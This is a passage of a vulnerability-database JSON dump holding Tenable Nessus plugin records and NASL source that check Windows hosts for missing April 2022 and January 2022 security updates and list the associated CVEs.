affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012639\nor cumulative update 5012670. It is, therefore, affected by\nmultiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24481, CVE-2022-24494,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24547, CVE-2022-24550,\n CVE-2022-26786, CVE-2022-26787, CVE-2022-26788,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26794,\n CVE-2022-26796, CVE-2022-26797, CVE-2022-26798,\n CVE-2022-26801, CVE-2022-26802, CVE-2022-26803,\n CVE-2022-26807, CVE-2022-26808, CVE-2022-26810,\n CVE-2022-26827, CVE-2022-26904)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24491,\n CVE-2022-24492, CVE-2022-24500, CVE-2022-24528,\n CVE-2022-24533, CVE-2022-24534, CVE-2022-24536,\n CVE-2022-24541, CVE-2022-26809, CVE-2022-26812,\n CVE-2022-26813, CVE-2022-26814, CVE-2022-26815,\n CVE-2022-26817, CVE-2022-26818, CVE-2022-26819,\n CVE-2022-26820, CVE-2022-26821, CVE-2022-26822,\n CVE-2022-26829, CVE-2022-26903, CVE-2022-26916,\n CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-24484,\n CVE-2022-24538, CVE-2022-26784, CVE-2022-26831,\n CVE-2022-26915)\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012639 or Cumulative Update 5012670\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012670',\n '5012639'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win81:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'6.3',\n sp:0,\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012670, 5012639])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:39:17", "description": "The Windows 11 installation on the remote host is missing security updates. It is, therefore, affected by multiple vulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can exploit this to perform actions with the privileges of another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21849, CVE-2022-21850, CVE-2022-21851, CVE-2022-21874, CVE-2022-21888, CVE-2022-21892, CVE-2022-21893, CVE-2022-21907, CVE-2022-21922, CVE-2022-21928, CVE-2022-21958, CVE-2022-21959, CVE-2022-21960, CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An attacker can exploit this and bypass the security feature and perform unauthorized actions compromising the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905, CVE-2022-21906, CVE-2022-21913, CVE-2022-21921, CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-21876, CVE-2022-21877, CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835, CVE-2022-21838, CVE-2022-21852, CVE-2022-21857, CVE-2022-21858, CVE-2022-21861, CVE-2022-21862, CVE-2022-21864, CVE-2022-21866, CVE-2022-21870, CVE-2022-21871, CVE-2022-21872, CVE-2022-21873, CVE-2022-21881, CVE-2022-21882, CVE-2022-21885, CVE-2022-21887, CVE-2022-21896, CVE-2022-21897, CVE-2022-21901, CVE-2022-21902, CVE-2022-21908, CVE-2022-21914, CVE-2022-21916, CVE-2022-21919, CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-21843, CVE-2022-21847, CVE-2022-21848, CVE-2022-21883, CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)", "cvss3": {}, "published": "2022-01-11T00:00:00", "type": "nessus", "title": "KB5009566: Windows 11 Security Updates (January 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2021-22947", "CVE-2021-36976", "CVE-2022-21833", "CVE-2022-21834", "CVE-2022-21835", "CVE-2022-21836", "CVE-2022-21838", "CVE-2022-21843", "CVE-2022-21847", "CVE-2022-21848", "CVE-2022-21849", "CVE-2022-21850", "CVE-2022-21851", "CVE-2022-21852", "CVE-2022-21857", "CVE-2022-21858", "CVE-2022-21861", "CVE-2022-21862", "CVE-2022-21864", "CVE-2022-21866", "CVE-2022-21870", "CVE-2022-21871", "CVE-2022-21872", "CVE-2022-21873", "CVE-2022-21874", "CVE-2022-21876", "CVE-2022-21877", "CVE-2022-21880", "CVE-2022-21881", "CVE-2022-21882", "CVE-2022-21883", "CVE-2022-21885", "CVE-2022-21887", "CVE-2022-21888", "CVE-2022-21889", "CVE-2022-21890", "CVE-2022-21892", "CVE-2022-21893", "CVE-2022-21894", "CVE-2022-21896", "CVE-2022-21897", "CVE-2022-21900", "CVE-2022-21901", "CVE-2022-21902", "CVE-2022-21905", "CVE-2022-21906", "CVE-2022-21907", "CVE-2022-21908", "CVE-2022-21913", "CVE-2022-21914", "CVE-2022-21915", "CVE-2022-21916", "CVE-2022-21918", "CVE-2022-21919", "CVE-2022-21920", "CVE-2022-21921", "CVE-2022-21922", "CVE-2022-21924", "CVE-2022-21925", "CVE-2022-21928", "CVE-2022-21958", "CVE-2022-21959", "CVE-2022-21960", "CVE-2022-21961", "CVE-2022-21962", "CVE-2022-21963"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_JAN_5009566.NASL", "href": "https://www.tenable.com/plugins/nessus/156622", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc. \n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(156622);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\n \"CVE-2021-22947\",\n \"CVE-2021-36976\",\n \"CVE-2022-21833\",\n \"CVE-2022-21834\",\n \"CVE-2022-21835\",\n \"CVE-2022-21836\",\n \"CVE-2022-21838\",\n \"CVE-2022-21843\",\n \"CVE-2022-21847\",\n \"CVE-2022-21848\",\n \"CVE-2022-21849\",\n \"CVE-2022-21850\",\n \"CVE-2022-21851\",\n \"CVE-2022-21852\",\n \"CVE-2022-21857\",\n \"CVE-2022-21858\",\n \"CVE-2022-21861\",\n \"CVE-2022-21862\",\n \"CVE-2022-21864\",\n \"CVE-2022-21866\",\n \"CVE-2022-21870\",\n \"CVE-2022-21871\",\n \"CVE-2022-21872\",\n \"CVE-2022-21873\",\n \"CVE-2022-21874\",\n \"CVE-2022-21876\",\n \"CVE-2022-21877\",\n \"CVE-2022-21880\",\n \"CVE-2022-21881\",\n \"CVE-2022-21882\",\n \"CVE-2022-21883\",\n \"CVE-2022-21885\",\n \"CVE-2022-21887\",\n \"CVE-2022-21888\",\n \"CVE-2022-21889\",\n \"CVE-2022-21890\",\n \"CVE-2022-21892\",\n \"CVE-2022-21893\",\n \"CVE-2022-21894\",\n \"CVE-2022-21896\",\n \"CVE-2022-21897\",\n \"CVE-2022-21900\",\n \"CVE-2022-21901\",\n \"CVE-2022-21902\",\n \"CVE-2022-21905\",\n \"CVE-2022-21906\",\n \"CVE-2022-21907\",\n \"CVE-2022-21908\",\n \"CVE-2022-21913\",\n \"CVE-2022-21914\",\n \"CVE-2022-21915\",\n \"CVE-2022-21916\",\n \"CVE-2022-21918\",\n \"CVE-2022-21919\",\n \"CVE-2022-21920\",\n \"CVE-2022-21921\",\n \"CVE-2022-21922\",\n \"CVE-2022-21924\",\n \"CVE-2022-21925\",\n \"CVE-2022-21928\",\n \"CVE-2022-21958\",\n \"CVE-2022-21959\",\n \"CVE-2022-21960\",\n \"CVE-2022-21961\",\n \"CVE-2022-21962\",\n \"CVE-2022-21963\"\n );\n script_xref(name:\"MSKB\", value:\"5009566\");\n script_xref(name:\"MSFT\", value:\"MS22-5009566\");\n script_xref(name:\"IAVA\", value:\"2022-A-0012-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0016-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/02/18\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2022-0001\");\n\n script_name(english:\"KB5009566: Windows 11 Security Updates (January 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The Windows 11 installation on the remote host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The Windows 11 installation on the remote host is missing\nsecurity updates. It is, therefore, affected by multiple\nvulnerabilities:\n\n - A session spoofing vulnerability exists. An attacker can\n exploit this to perform actions with the privileges of\n another user. (CVE-2022-21836)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21849,\n CVE-2022-21850, CVE-2022-21851, CVE-2022-21874,\n CVE-2022-21888, CVE-2022-21892, CVE-2022-21893,\n CVE-2022-21907, CVE-2022-21922, CVE-2022-21928,\n CVE-2022-21958, CVE-2022-21959, CVE-2022-21960,\n CVE-2022-21961, CVE-2022-21962, CVE-2022-21963)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2022-21894, CVE-2022-21900, CVE-2022-21905,\n CVE-2022-21906, CVE-2022-21913, CVE-2022-21921,\n CVE-2022-21924, CVE-2022-21925)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-21876, CVE-2022-21877,\n CVE-2022-21880, CVE-2022-21915)\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-21833, CVE-2022-21834, CVE-2022-21835,\n CVE-2022-21838, CVE-2022-21852, CVE-2022-21857,\n CVE-2022-21858, CVE-2022-21861, CVE-2022-21862,\n CVE-2022-21864, CVE-2022-21866, CVE-2022-21870,\n CVE-2022-21871, CVE-2022-21872, CVE-2022-21873,\n CVE-2022-21881, CVE-2022-21882, CVE-2022-21885,\n CVE-2022-21887, CVE-2022-21896, CVE-2022-21897,\n CVE-2022-21901, CVE-2022-21902, CVE-2022-21908,\n CVE-2022-21914, CVE-2022-21916, CVE-2022-21919,\n CVE-2022-21920)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-21843,\n CVE-2022-21847, CVE-2022-21848, CVE-2022-21883,\n CVE-2022-21889, CVE-2022-21890, CVE-2022-21918)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5009566\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released KB5009566 to address this issue.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-21907\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Win32k ConsoleControl Offset Confusion');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_func.inc');\ninclude('misc_func.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = \"MS22-01\";\nkbs = make_list('5009566');\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:'22000',\n rollup_date:'01_2022',\n bulletin:bulletin,\n rollup_kb_list:[5009566])\n \n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:05", "description": "The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24479, CVE-2022-24481, CVE-2022-24486, CVE-2022-24494, CVE-2022-24496, CVE-2022-24499, CVE-2022-24521, CVE-2022-24527, CVE-2022-24530, CVE-2022-24540, CVE-2022-24542, CVE-2022-24544, CVE-2022-24546, CVE-2022-24547, CVE-2022-24549, CVE-2022-24550, CVE-2022-26786, CVE-2022-26787, CVE-2022-26788, CVE-2022-26789, CVE-2022-26790, CVE-2022-26792, CVE-2022-26793, CVE-2022-26794, CVE-2022-26795, CVE-2022-26796, CVE-2022-26797, CVE-2022-26798, CVE-2022-26801, CVE-2022-26802, CVE-2022-26803, CVE-2022-26807, CVE-2022-26808, CVE-2022-26810, CVE-2022-26827, CVE-2022-26828, CVE-2022-26904, CVE-2022-26914)\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831, CVE-2022-26915)\n\n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-21983, CVE-2022-22008, CVE-2022-24485, CVE-2022-24487, CVE-2022-24491, CVE-2022-24492, CVE-2022-24495, CVE-2022-24500, CVE-2022-24528, CVE-2022-24533, CVE-2022-24534, CVE-2022-24537, CVE-2022-24541, CVE-2022-24545, CVE-2022-26809, CVE-2022-26826, CVE-2022-26903, CVE-2022-26916, CVE-2022-26917, CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can exploit this to disclose potentially sensitive information. (CVE-2022-24483, CVE-2022-24493, CVE-2022-24498, CVE-2022-26920)", "cvss3": {}, "published": "2022-04-12T00:00:00", "type": "nessus", "title": "KB5012591: Windows 10 version 1909 / Windows Server 1909 Security Update (April 2022)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2022-21983", "CVE-2022-22008", "CVE-2022-24474", "CVE-2022-24479", "CVE-2022-24481", "CVE-2022-24482", "CVE-2022-24483", "CVE-2022-24485", "CVE-2022-24486", "CVE-2022-24487", "CVE-2022-24491", "CVE-2022-24492", "CVE-2022-24493", "CVE-2022-24494", "CVE-2022-24495", "CVE-2022-24496", "CVE-2022-24497", "CVE-2022-24498", "CVE-2022-24499", "CVE-2022-24500", "CVE-2022-24521", "CVE-2022-24527", "CVE-2022-24528", "CVE-2022-24530", "CVE-2022-24533", "CVE-2022-24534", "CVE-2022-24537", "CVE-2022-24540", "CVE-2022-24541", "CVE-2022-24542", "CVE-2022-24544", "CVE-2022-24545", "CVE-2022-24546", "CVE-2022-24547", "CVE-2022-24549", "CVE-2022-24550", "CVE-2022-26786", "CVE-2022-26787", "CVE-2022-26788", "CVE-2022-26789", "CVE-2022-26790", "CVE-2022-26792", "CVE-2022-26793", "CVE-2022-26794", "CVE-2022-26795", "CVE-2022-26796", "CVE-2022-26797", "CVE-2022-26798", "CVE-2022-26801", "CVE-2022-26802", "CVE-2022-26803", "CVE-2022-26807", "CVE-2022-26808", "CVE-2022-26809", "CVE-2022-26810", "CVE-2022-26826", "CVE-2022-26827", "CVE-2022-26828", "CVE-2022-26831", "CVE-2022-26903", "CVE-2022-26904", "CVE-2022-26914", "CVE-2022-26915", "CVE-2022-26916", "CVE-2022-26917", "CVE-2022-26918", "CVE-2022-26919", "CVE-2022-26920"], "modified": "2023-02-03T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS22_APR_5012591.NASL", "href": "https://www.tenable.com/plugins/nessus/159679", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(159679);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/02/03\");\n\n script_cve_id(\n \"CVE-2022-21983\",\n \"CVE-2022-22008\",\n \"CVE-2022-24474\",\n \"CVE-2022-24479\",\n \"CVE-2022-24481\",\n \"CVE-2022-24482\",\n \"CVE-2022-24483\",\n \"CVE-2022-24485\",\n \"CVE-2022-24486\",\n \"CVE-2022-24487\",\n \"CVE-2022-24491\",\n \"CVE-2022-24492\",\n \"CVE-2022-24493\",\n \"CVE-2022-24494\",\n \"CVE-2022-24495\",\n \"CVE-2022-24496\",\n \"CVE-2022-24497\",\n \"CVE-2022-24498\",\n \"CVE-2022-24499\",\n \"CVE-2022-24500\",\n \"CVE-2022-24521\",\n \"CVE-2022-24527\",\n \"CVE-2022-24528\",\n \"CVE-2022-24530\",\n \"CVE-2022-24533\",\n \"CVE-2022-24534\",\n \"CVE-2022-24537\",\n \"CVE-2022-24540\",\n \"CVE-2022-24541\",\n \"CVE-2022-24542\",\n \"CVE-2022-24544\",\n \"CVE-2022-24545\",\n \"CVE-2022-24546\",\n \"CVE-2022-24547\",\n \"CVE-2022-24549\",\n \"CVE-2022-24550\",\n \"CVE-2022-26786\",\n \"CVE-2022-26787\",\n \"CVE-2022-26788\",\n \"CVE-2022-26789\",\n \"CVE-2022-26790\",\n \"CVE-2022-26792\",\n \"CVE-2022-26793\",\n \"CVE-2022-26794\",\n \"CVE-2022-26795\",\n \"CVE-2022-26796\",\n \"CVE-2022-26797\",\n \"CVE-2022-26798\",\n \"CVE-2022-26801\",\n \"CVE-2022-26802\",\n \"CVE-2022-26803\",\n \"CVE-2022-26807\",\n \"CVE-2022-26808\",\n \"CVE-2022-26809\",\n \"CVE-2022-26810\",\n \"CVE-2022-26826\",\n \"CVE-2022-26827\",\n \"CVE-2022-26828\",\n \"CVE-2022-26831\",\n \"CVE-2022-26903\",\n \"CVE-2022-26904\",\n \"CVE-2022-26914\",\n \"CVE-2022-26915\",\n \"CVE-2022-26916\",\n \"CVE-2022-26917\",\n \"CVE-2022-26918\",\n \"CVE-2022-26919\",\n \"CVE-2022-26920\"\n );\n script_xref(name:\"MSKB\", value:\"5012591\");\n script_xref(name:\"MSFT\", value:\"MS22-5012591\");\n script_xref(name:\"IAVA\", value:\"2022-A-0145-S\");\n script_xref(name:\"IAVA\", value:\"2022-A-0147-S\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/04\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/05/16\");\n\n script_name(english:\"KB5012591: Windows 10 version 1909 / Windows Server 1909 Security Update (April 2022)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5012591.\nIt is, therefore, affected by multiple vulnerabilities:\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2022-24474, CVE-2022-24479, CVE-2022-24481,\n CVE-2022-24486, CVE-2022-24494, CVE-2022-24496,\n CVE-2022-24499, CVE-2022-24521, CVE-2022-24527,\n CVE-2022-24530, CVE-2022-24540, CVE-2022-24542,\n CVE-2022-24544, CVE-2022-24546, CVE-2022-24547,\n CVE-2022-24549, CVE-2022-24550, CVE-2022-26786,\n CVE-2022-26787, CVE-2022-26788, CVE-2022-26789,\n CVE-2022-26790, CVE-2022-26792, CVE-2022-26793,\n CVE-2022-26794, CVE-2022-26795, CVE-2022-26796,\n CVE-2022-26797, CVE-2022-26798, CVE-2022-26801,\n CVE-2022-26802, CVE-2022-26803, CVE-2022-26807,\n CVE-2022-26808, CVE-2022-26810, CVE-2022-26827,\n CVE-2022-26828, CVE-2022-26904, CVE-2022-26914)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2022-26831,\n CVE-2022-26915)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2022-21983,\n CVE-2022-22008, CVE-2022-24485, CVE-2022-24487,\n CVE-2022-24491, CVE-2022-24492, CVE-2022-24495,\n CVE-2022-24500, CVE-2022-24528, CVE-2022-24533,\n CVE-2022-24534, CVE-2022-24537, CVE-2022-24541,\n CVE-2022-24545, CVE-2022-26809, CVE-2022-26826,\n CVE-2022-26903, CVE-2022-26916, CVE-2022-26917,\n CVE-2022-26918, CVE-2022-26919)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2022-24483, CVE-2022-24493,\n CVE-2022-24498, CVE-2022-26920)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://support.microsoft.com/en-us/help/5012591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Update 5012591\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2022-26809\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'User Profile Arbitrary Junction Creation Local Privilege Elevation');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2022/04/12\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2022/04/12\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2022-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS22-04';\nkbs = make_list(\n '5012591'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'04_2022',\n bulletin:bulletin,\n rollup_kb_list:[5012591])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:44:04", "description": "The remote Windows host is missing security update 5012592. It is, therefore, affected by multiple vulnerabilities:\n\n - A denial of service (DoS) vulnerability. An attacker can exploit this issue to cause the affected component to deny system or application services. (CVE-2022-26831 CVE-2022-26915, CVE-2022-23268) \n - A remote code execution vulnerability. An attacker can exploit this to bypass authentication and execute unauthorized arbitrary commands. (CVE-2022-26916, CVE-2022-26917, CVE-2022-26809, CVE-2022-26919, 